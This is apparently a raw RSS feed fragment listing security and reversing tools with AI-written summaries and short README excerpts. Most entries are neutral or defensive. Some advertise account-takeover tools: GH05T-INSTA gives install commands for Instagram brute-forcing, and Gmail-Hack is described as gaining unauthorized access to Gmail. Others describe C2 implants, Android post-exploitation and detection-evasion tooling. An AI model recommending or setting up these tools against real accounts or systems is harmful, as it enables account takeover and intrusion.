&lt;p&gt;&lt;em&gt;&lt;strong&gt;A curated list of tools, tutorials, and much more for reverse engineering video games!&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;</description></item><item><title>game-reversing</title><link>https://rainmana.github.io/hackyfeed/tools/kovidomi-game-reversing/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kovidomi-game-reversing/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;kovidomi/game-reversing&amp;rdquo; repository offers a curated collection of learning materials aimed at facilitating the reverse engineering of video games, particularly for those targeting PC games on the Windows platform using x86 assembly language. It emphasizes essential tools and skills, including Cheat Engine, IDA, and Ghidra, while providing a structured learning pathway that covers foundational knowledge in computing, game programming, and Windows internals. Noteworthy features include a focus on practical resources and a directive to understanding specific game engines, useful for effective reverse engineering.&lt;/p&gt;</description></item><item><title>GameTracking-CS2</title><link>https://rainmana.github.io/hackyfeed/tools/steamtracking-gametracking-cs2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamtracking-gametracking-cs2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GameTracking-CS2 is a tool designed to automate the tracking of in-game statistics and events for Counter-Strike 2, thereby reducing the manual effort involved in monitoring gameplay data. It provides seamless integration with existing GameTracking functionalities, allowing users to monitor game performance effortlessly. Notable features include real-time tracking capabilities and community support through its Discord channel.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="game-tracker-counter-strike-2"&gt;Game Tracker: Counter-Strike 2&lt;/h2&gt;
&lt;p&gt;Tracking things, so you don&amp;rsquo;t have to.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/SteamDatabase/GameTracking#readme"&gt;See readme in main GameTracking repository for more information on how files are tracked.&lt;/a&gt;&lt;/p&gt;</description></item><item><title>GameTracking-Dota2</title><link>https://rainmana.github.io/hackyfeed/tools/steamtracking-gametracking-dota2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamtracking-gametracking-dota2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GameTracking-Dota2 is a tool designed to automate the tracking of in-game statistics and player performance in Dota 2. Its primary use case is to relieve players of the manual effort involved in monitoring game data, providing streamlined insights into gameplay trends. Notable features include integration with a broader GameTracking ecosystem and community support via Discord.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="game-tracker-dota-2"&gt;Game Tracker: Dota 2&lt;/h2&gt;
&lt;p&gt;Tracking things, so you don&amp;rsquo;t have to.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/SteamDatabase/GameTracking#readme"&gt;See readme in main GameTracking repository for more information on how files are tracked.&lt;/a&gt;&lt;/p&gt;</description></item><item><title>GARbro</title><link>https://rainmana.github.io/hackyfeed/tools/morkt-garbro/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/morkt-garbro/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GARbro is a resource browser designed for Visual Novels, enabling users to browse and extract content from various archive formats. The tool supports a wide range of file types, allows file extraction and conversion to common formats, and provides a user-friendly interface with customizable hotkeys for efficient navigation and operation within file archives. Notably, it offers features for handling encrypted archives and manual file type assignment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="garbro"&gt;GARbro&lt;/h1&gt;
&lt;p&gt;Visual Novels resource browser.&lt;/p&gt;</description></item><item><title>Garud</title><link>https://rainmana.github.io/hackyfeed/tools/r0x4r-garud/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/r0x4r-garud/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Garud is an automation tool designed for reconnaissance, specifically targeting sub-domain enumeration and vulnerability scanning for injection points such as XSS, SSRF, and SSTI. It integrates multiple popular bug bounty tools, including Assetfinder, Subfinder, and Nuclei, to streamline the scanning process, outputting results systematically while notifying the user upon completion. Notable features include the ability to filter and identify low-hanging vulnerabilities, along with systematic data collection and reporting functionalities.&lt;/p&gt;</description></item><item><title>gasmask</title><link>https://rainmana.github.io/hackyfeed/tools/twelvesec-gasmask/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/twelvesec-gasmask/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GasMasK is an all-in-one open-source information gathering tool designed for Open Source Intelligence (OSINT) tasks. It facilitates data collection across various platforms such as Google, Shodan, and social media, allowing users to search for domains and extract relevant information through an extensive set of features, including customizable output formats and API integrations for enhanced functionality. The tool is built in Python and supports numerous search methods, making it a versatile choice for cybersecurity professionals conducting reconnaissance.&lt;/p&gt;</description></item><item><title>GDA-android-reversing-Tool</title><link>https://rainmana.github.io/hackyfeed/tools/charles2gan-gda-android-reversing-tool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/charles2gan-gda-android-reversing-tool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GDA (GJoy Dex Analyzer) is a powerful Dalvik bytecode decompiler designed for fast analysis of APK, DEX, ODEX, OAT, JAR, CLASS, and AAR files, with minimal memory and disk consumption. It features advanced capabilities including malicious behavior detection, vulnerability scanning, path solving, and deobfuscation, as well as various utilities for interactive operation and assisted analysis. GDA operates natively without requiring a Java VM, making it suitable for use on various Windows systems and virtual machines.&lt;/p&gt;</description></item><item><title>geacon</title><link>https://rainmana.github.io/hackyfeed/tools/darkr4y-geacon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/darkr4y-geacon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Geacon is a tool designed for implementing CobaltStrike&amp;rsquo;s Beacon using Go, primarily aimed at protocol analysis and reverse engineering. It supports CobaltStrike 4.1 and includes functionalities such as command execution, file upload/download, and directory navigation. The tool emphasizes learning and experimentation, with a strong caution against illegal use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="geacon"&gt;Geacon&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Using Go to implement CobaltStrike&amp;rsquo;s Beacon&lt;/strong&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;This project is for learning protocol analysis and reverse engineering only, if someone&amp;rsquo;s rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY&lt;/em&gt;&lt;/p&gt;</description></item><item><title>Gemini-API</title><link>https://rainmana.github.io/hackyfeed/tools/hanaokayuzu-gemini-api/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hanaokayuzu-gemini-api/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gemini-API is an asynchronous Python wrapper for the Google Gemini web application, designed for generating and editing content through natural language queries. Key features include persistent cookie management, image generation capabilities, customization via system prompts and extensions, support for streaming output, and the ability to classify various types of responses. The tool is built on &lt;code&gt;asyncio&lt;/code&gt;, ensuring efficient execution for always-on services and complex interactions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/HanaokaYuzu/Gemini-API/master/assets/banner.png" width="55%" alt="Gemini Banner" align="center"&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://pypi.org/project/gemini-webapi"&gt;
 &lt;img src="https://img.shields.io/pypi/v/gemini-webapi" alt="PyPI"&gt;&lt;/a&gt;
 &lt;a href="https://pepy.tech/project/gemini-webapi"&gt;
 &lt;img src="https://static.pepy.tech/badge/gemini-webapi" alt="Downloads"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/HanaokaYuzu/Gemini-API/network/dependencies"&gt;
 &lt;img src="https://img.shields.io/librariesio/github/HanaokaYuzu/Gemini-API" alt="Dependencies"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/HanaokaYuzu/Gemini-API/blob/master/LICENSE"&gt;
 &lt;img src="https://img.shields.io/github/license/HanaokaYuzu/Gemini-API" alt="License"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/psf/black"&gt;
 &lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>GeoIntel</title><link>https://rainmana.github.io/hackyfeed/tools/atiilla-geointel/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/atiilla-geointel/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GeoIntel is a Python tool leveraging Google&amp;rsquo;s Gemini API for AI-powered geolocation analysis of images, allowing users to identify the likely location where photos were taken. It features both a command-line interface and an interactive web interface with drag-and-drop functionality, real-time analysis, and support for additional context and location guesses. Notable capabilities include generating Google Maps links, providing confidence levels for predictions, and exporting results in JSON format.&lt;/p&gt;</description></item><item><title>geowifi</title><link>https://rainmana.github.io/hackyfeed/tools/gonzosint-geowifi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gonzosint-geowifi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; geowifi is a tool designed for querying WiFi geolocation data based on the BSSID or SSID from various public databases. Its primary use case is to facilitate the retrieval of network location information, providing output in either map or JSON format. Notable features include support for multiple APIs like Wigle, Google Geolocation, and Combain, enabling users to easily configure and access comprehensive WiFi data.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="--geowifi"&gt;📡💘🌎 | geowifi&lt;/h1&gt;
&lt;p&gt;Search WiFi geolocation data by BSSID and SSID on different public databases.&lt;/p&gt;</description></item><item><title>Gepetto</title><link>https://rainmana.github.io/hackyfeed/tools/justicerage-gepetto/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/justicerage-gepetto/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gepetto is a Python plugin designed for integration with IDA Pro (≥ 7.6) that utilizes large language models to analyze and enhance decompiled functions. Its primary use case includes providing detailed explanations of function behavior and automatically renaming variables for clarity. Notable features include support for multiple AI models, including those from OpenAI, Google, and Azure, along with an easy installation process via the Hex-Rays CLI tool.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gepetto"&gt;Gepetto&lt;/h1&gt;
&lt;p&gt;Gepetto is a Python plugin which uses various large language models to provide meaning to functions
decompiled by IDA Pro (≥ 7.6). It can leverage them to explain what a function does, and to automatically
rename its variables. Here is a simple example of what results it can provide in mere seconds:&lt;/p&gt;</description></item><item><title>getJS</title><link>https://rainmana.github.io/hackyfeed/tools/003random-getjs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/003random-getjs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; getJS is a command-line tool and Go package designed for extracting JavaScript sources from URLs and HTTP responses, catering primarily to penetration testers, bug bounty hunters, and developers. Its notable features include customizable request options, support for input from files, and the ability to resolve relative URLs, enhancing the efficiency of JavaScript extraction processes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;JavaScript Extraction CLI &amp; Package&lt;/h1&gt;
&lt;p align="center"&gt;
 &lt;a href="https://pkg.go.dev/github.com/003random/getJS"&gt;
 &lt;img src="https://pkg.go.dev/badge/github.com/003random/getJS"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/003random/getJS/releases"&gt;
 &lt;img src="https://img.shields.io/github/release/003random/getJS.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/003random/getJS/blob/master/LICENSE"&gt;
 &lt;img src="https://img.shields.io/badge/license-MIT-blue.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is a powerful tool for extracting JavaScript sources from URLs and web pages / HTTP responses. It offers a command-line interface (CLI) for straightforward URL processing and a package interface for custom integrations, making it ideal for pentesters, bug bounty hunters, and developers needing to extract JS sources efficiently.&lt;/p&gt;</description></item><item><title>GH05T-INSTA</title><link>https://rainmana.github.io/hackyfeed/tools/gh05t-hunter5-gh05t-insta/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh05t-hunter5-gh05t-insta/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GH05T-INSTA is a cybersecurity tool designed for brute-force password recovery on Instagram accounts, suitable for both rooted and non-rooted Android devices. It features automatic IP address anonymization, error detection and resolution, and allows users to create custom password lists for enhanced effectiveness. While marketed as a hacking tool, the developers emphasize the legal implications and responsibility of ethical usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;b&gt;The best way to hack Instagram&lt;/b&gt;&lt;/p&gt;
&lt;img src="https://media.tenor.com/qMER41oNWx8AAAAC/youve-been-hacked-gregory-brown.gif"&gt;
&lt;h1&gt;New Working Tool Link : &lt;a href="https://github.com/GH05T-HUNTER5/insta-breaker"&gt;Click&lt;/a&gt;&lt;/h1&gt;
&lt;h2 id="installation-kali"&gt;Installation {Kali}&lt;/h2&gt;
&lt;h3 id="bruteforce-gh05t-insta"&gt;BruteForce (GH05T-INSTA)&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;apt install git
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cd GH05T-INSTA
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;sudo bash setup.sh
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;code&gt;Configuring Tor server to open control port&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Ghost</title><link>https://rainmana.github.io/hackyfeed/tools/entysec-ghost/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/entysec-ghost/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ghost Framework is an Android post-exploitation framework that leverages the Android Debug Bridge to enable remote access to Android devices. Its primary use case is for penetration testing and security assessments of Android applications and devices. Notable features include ease of installation via pip and a focus on facilitating comprehensive exploitation scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h3 align="center"&gt;
 &lt;img src="https://user-images.githubusercontent.com/54115104/116760735-6da1e780-aa1e-11eb-8c6f-530386487671.png" alt="logo" height="250px"&gt;
&lt;/h3&gt;
&lt;p align="center"&gt;
 &lt;b&gt;Ghost Framework&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="https://entysec.com"&gt;
 &lt;img src="https://img.shields.io/badge/developer-EntySec-blue.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost"&gt;
 &lt;img src="https://img.shields.io/badge/language-Python-blue.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost/forks"&gt;
 &lt;img src="https://img.shields.io/github/forks/EntySec/Ghost?style=flat&amp;color=green"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/EntySec/Ghost/stargazers"&gt;
 &lt;img src="https://img.shields.io/github/stars/EntySec/Ghost?style=flat&amp;color=yellow"&gt;
 &lt;/a&gt;
 &lt;a href="https://www.codefactor.io/repository/github/entysec/ghost"&gt;
 &lt;img src="https://www.codefactor.io/repository/github/entysec/ghost/badge"&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Ghost Framework is an Android post-exploitation framework that
 &lt;br&gt;exploits the Android Debug Bridge to remotely access an Android device.
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Installation&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;code&gt;pip3 install git+https://github.com/EntySec/Ghost&lt;/code&gt;
&lt;/p&gt;</description></item><item><title>GhostStrike</title><link>https://rainmana.github.io/hackyfeed/tools/stivenhacker-ghoststrike/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/stivenhacker-ghoststrike/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GhostStrike is a sophisticated cybersecurity tool developed for Red Team operations, utilizing techniques such as process hollowing and dynamic API resolution to execute covert actions on Windows systems while evading detection. Its notable features include shellcode encoding/decoding, cryptographic key generation for enhanced security, and control flow flattening to complicate analysis efforts. Designed for educational use in controlled environments, GhostStrike emphasizes the importance of responsible usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ghoststrike-"&gt;GhostStrike ⚔️&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;GhostStrike&lt;/strong&gt; is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.&lt;/p&gt;</description></item><item><title>GhostTrack</title><link>https://rainmana.github.io/hackyfeed/tools/hunxbyts-ghosttrack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hunxbyts-ghosttrack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GhostTrack is an OSINT tool designed for tracking the location or mobile number of targets, facilitating information gathering through various tracking functionalities. Its notable features include IP tracking, phone number tracking, and username tracking across social media platforms, allowing users to collect comprehensive data on their targets. The tool is straightforward to install on Linux or Termux and is continuously updated, with the latest version being 2.2.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ghosttrack"&gt;GhostTrack&lt;/h1&gt;
&lt;p&gt;Useful tool to track location or mobile number, so this tool can be called osint or also information gathering&lt;/p&gt;</description></item><item><title>Ghostwriter</title><link>https://rainmana.github.io/hackyfeed/tools/ghostmanager-ghostwriter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ghostmanager-ghostwriter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ghostwriter is an open-source platform that streamlines offensive security operations by facilitating report writing, asset tracking, and assessment management. Key features include a robust reporting engine with customizable templates, role-based access controls, and integrations with tools like Mythic C2 and Cobalt Strike for automatic activity logging. The platform enhances collaboration among red teams and consultants by providing a centralized environment to manage client information and generate comprehensive reports in various formats.&lt;/p&gt;</description></item><item><title>GHunt</title><link>https://rainmana.github.io/hackyfeed/tools/mxrch-ghunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mxrch-ghunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GHunt is an offensive Google framework focused on OSINT, enabling users to extract information using various modules related to Google services. Key features include a command-line interface, asynchronous processing, JSON export capabilities, and a browser extension for easier login. The tool is designed for security assessments, data gathering, and enhancing investigative workflows linked to Google accounts and assets.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="assets/long_banner.png" alt=""&gt;&lt;/p&gt;
&lt;br&gt;
&lt;h4 id="-ghunt-online-version-"&gt;🌐 GHunt Online version : &lt;a href="https://osint.industries"&gt;https://osint.industries&lt;/a&gt;&lt;/h4&gt;
&lt;h4 id="-now-python-313-compatible-"&gt;🐍 Now Python 3.13 compatible !&lt;/h4&gt;
&lt;br&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/Python-3.10%2B-brightgreen" alt="Python minimum version"&gt;&lt;/p&gt;</description></item><item><title>git-hound</title><link>https://rainmana.github.io/hackyfeed/tools/tillson-git-hound/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tillson-git-hound/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitHound is a secret detection tool designed to identify exposed API keys, secrets, and credentials across GitHub repositories using advanced pattern matching and commit-history analysis. Its notable features include global GitHub search capabilities, smart API key detection mechanisms, and the ability to visualize results in real-time through the GitHound Explore dashboard. This tool is particularly useful for security professionals in corporate environments and bug bounty hunters seeking to uncover sensitive information that may lead to vulnerabilities.&lt;/p&gt;</description></item><item><title>GitFive</title><link>https://rainmana.github.io/hackyfeed/tools/mxrch-gitfive/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mxrch-gitfive/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitFive is an OSINT tool designed for investigating GitHub profiles, enabling users to track username histories, variations, and associated email addresses. Key features include the ability to discover GitHub accounts from lists of emails, analyze repositories, and generate possible email combinations, all while operating efficiently within GitHub&amp;rsquo;s API rate limits. The tool also supports features like SSH key dumping and JSON exports for ease of data handling.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;img src="assets/banner.png" alt=""&gt;&lt;/p&gt;</description></item><item><title>GitGot</title><link>https://rainmana.github.io/hackyfeed/tools/bishopfox-gitgot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bishopfox-gitgot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitGot is a semi-automated tool designed for the quick identification of sensitive information and secrets stored in public GitHub repositories. It leverages user feedback to refine search results, allowing for the dynamic creation of blacklists based on filenames, repository names, or file content matches. Notable features include session persistence, the ability to query GitHub Gists or self-hosted instances, and support for advanced search syntax using the GitHub Search API.&lt;/p&gt;</description></item><item><title>gitGraber</title><link>https://rainmana.github.io/hackyfeed/tools/hisxo-gitgraber/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hisxo-gitgraber/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; gitGraber is a real-time monitoring tool designed to detect sensitive data leaks across GitHub for various online services, including AWS and Facebook. Its primary use case is to identify and notify users of potential API key exposures through Slack, Discord, or directly in the command line, while minimizing false positives with precise regex patterns. Notable features include configurable keyword searches, automated monitoring through cron jobs, and a dynamic wordlist that adapts to discovered filenames.&lt;/p&gt;</description></item><item><title>github-search</title><link>https://rainmana.github.io/hackyfeed/tools/gwen001-github-search/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gwen001-github-search/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GitHub Search is a collection of tools designed to perform advanced searches on GitHub repositories using bash, Python, and PHP. It primarily facilitates users in conducting tailored searches across GitHub by leveraging personal access tokens for authentication, enhancing the search capability and efficiency. Notable features include support for multiple scripting languages and a straightforward setup process through environment variable configuration or a tokens file.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;github-search&lt;/h1&gt;
&lt;h4 align="center"&gt;A collection of tools to perform searches on GitHub.&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;img src="https://img.shields.io/badge/-bash-gray" alt="bash badge"&gt;
 &lt;img src="https://img.shields.io/badge/python-v3-blue" alt="python badge"&gt;
 &lt;img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge"&gt;
 &lt;img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge"&gt;
 &lt;a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fgithub-search%2f" target="_blank"&gt;&lt;img src="https://img.shields.io/twitter/url?style=social&amp;url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fgithub-search" alt="twitter badge"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>github-subdomains</title><link>https://rainmana.github.io/hackyfeed/tools/gwen001-github-subdomains/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gwen001-github-subdomains/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The github-subdomains tool is designed to search GitHub for subdomains related to a specified domain and parse the search results efficiently. Key features include the ability to use multiple GitHub tokens to manage rate limits, an option for extended searches, and customizable output formats for the collected subdomains. This tool is particularly useful for security researchers and analysts looking to identify exposed subdomains for threat assessment or reconnaissance purposes.&lt;/p&gt;</description></item><item><title>gitjacker</title><link>https://rainmana.github.io/hackyfeed/tools/liamg-gitjacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/liamg-gitjacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gitjacker is a tool designed to retrieve git repositories and their contents from web servers where the &lt;code&gt;.git&lt;/code&gt; directory has been unintentionally exposed. It effectively extracts repository data even when directory listings are disabled, making it suitable for educational purposes and penetration testing. Notable features include ease of installation via a simple script and the ability to operate in scenarios where access to traditional repository resources is restricted.&lt;/p&gt;</description></item><item><title>gitleaks</title><link>https://rainmana.github.io/hackyfeed/tools/gitleaks-gitleaks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gitleaks-gitleaks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gitleaks is a tool designed for the detection of sensitive information, such as passwords, API keys, and tokens, within Git repositories and other files. Its primary use case is to identify and prevent the accidental exposure of secrets in code, and it offers notable features such as integration with GitHub Actions and pre-commit hooks for continuous monitoring. Additionally, Gitleaks utilizes a robust detection engine based on regular expressions to analyze codebases efficiently.&lt;/p&gt;</description></item><item><title>globalthreatmap</title><link>https://rainmana.github.io/hackyfeed/tools/unicodeveloper-globalthreatmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/unicodeveloper-globalthreatmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Global Threat &amp;amp; Event Intelligence Map is a real-time situational awareness platform designed for visualizing security events, geopolitical developments, and threat indicators on an interactive map. Key features include a customizable event mapping system, a filterable event feed, and detailed intelligence dossiers on various actors, along with visualization layers for military bases. This tool serves as an OSINT command center, aggregating and synthesizing global conflict data for enhanced situational analysis.&lt;/p&gt;</description></item><item><title>Gmail-Hack</title><link>https://rainmana.github.io/hackyfeed/tools/zard2007-gmail-hack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zard2007-gmail-hack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Gmail-Hack is a Python-based tool designed for unauthorized access to Gmail accounts, primarily focused on users operating in Termux or Linux environments. It features a straightforward installation process and is intended for educational purposes, with caveats regarding its ethical use. Notably, the tool claims to facilitate hacking actions with minimal setup time, emphasizing its ease of use for individuals familiar with command-line interfaces.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gmail-hack"&gt;Gmail-Hack&lt;/h1&gt;
